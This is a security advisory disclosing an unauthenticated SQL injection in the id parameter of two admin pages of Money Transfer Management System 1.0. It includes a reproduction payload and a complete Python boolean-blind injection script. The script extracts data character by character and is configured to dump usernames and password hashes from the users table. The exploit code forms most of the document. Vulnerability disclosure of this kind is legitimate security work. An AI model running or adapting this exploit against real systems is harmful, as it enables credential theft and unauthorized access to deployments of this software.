Money Transfer Management System 1.0 - Unauthenticated SQLi

Summary

NameMoney Transfer Management System - Unauthenticated SQL Injection
Code name
ProductMoney Transfer Management System
Affected versionsVersion 1.0
StatePublic
Release date2022-03-15

Vulnerability

KindSQL injection
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSSv3.1 Base Score7.5
Exploit availableYes
CVE ID(s)

Description

Money Transfer Management System Version 1.0 allows an unauthenticated user to inject SQL queries in admin/maintenance/manage_branch.php and admin/maintenance/manage_fee.php via the id parameter.

Proof of Concept

Steps to reproduce

  1. Go to http://127.0.0.1/mtms/admin/maintenance/manage_branch.php

  2. Insert the following query inside the id parameter.

    ?id=1' and 1=1 -- -
    
  3. The server response changes if the second part of the query is true or false. To automate the process use the below exploit.

System Information

  • Version: Money Transfer Management System version 1.0.
  • Operating System: Linux.
  • Web Server: Apache
  • PHP Version: 7.4
  • Database and version: MySQL

Exploit

import requests import urllib.parse dictionary = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~""" def sqli_bool(base_url,query): url = "?id=1' and %s -- -" % query #proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'} #r = requests.get(base_url+url, proxies=proxies) r = requests.get(base_url+url) if len(r.text) > 2700:
        return True

    else:
        return False


def get_length(url, query):

    for i in range(0,200):
        current_query = "(length((%s))=%s)"%(query,str(i))
        current_query = current_query=urllib.parse.quote(current_query)
        if sqli_bool(url,current_query):
            break

    if i !=199:
        return i
    else:
        return -1


def make_query(url,query):

    # Get length
    length = get_length(url,query)

    print("[*] Getting output length:")
    if length == -1:
        print("Error getting query length")
        return 0
    print("[+] Output Length: " + str(length))

    current_result = ""

    print()
    print("[*] Getting output: ")

    for pos in range(length+1):
        for char in dictionary:

            current_query = '(substr((%s),%s,1)="%s")' %(query,str(pos),requests.utils.quote(char))
            if sqli_bool(url,current_query):
                current_result += char
                print(current_result, end='\r')
                break

    print("[+] Found: " + " " * 100)
    print(current_result)


url = "http://127.0.0.1/mtms/admin/maintenance/manage_branch.php"

# must be only 1 row
# use limit and offset to iterate

# CHANGE THIS
query = "select concat(username,':', password) as t1 from users limit 1"

make_query(url,query)

Mitigation

By 2022-03-15 there is not a patch resolving the issue.

Credits

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

References

Vendor page https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Timeline

Time-lapse-logo

2022-02-15

Vulnerability discovered.

Time-lapse-logo

2022-02-15

Vendor contacted.

Time-lapse-logo

2022-03-15

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.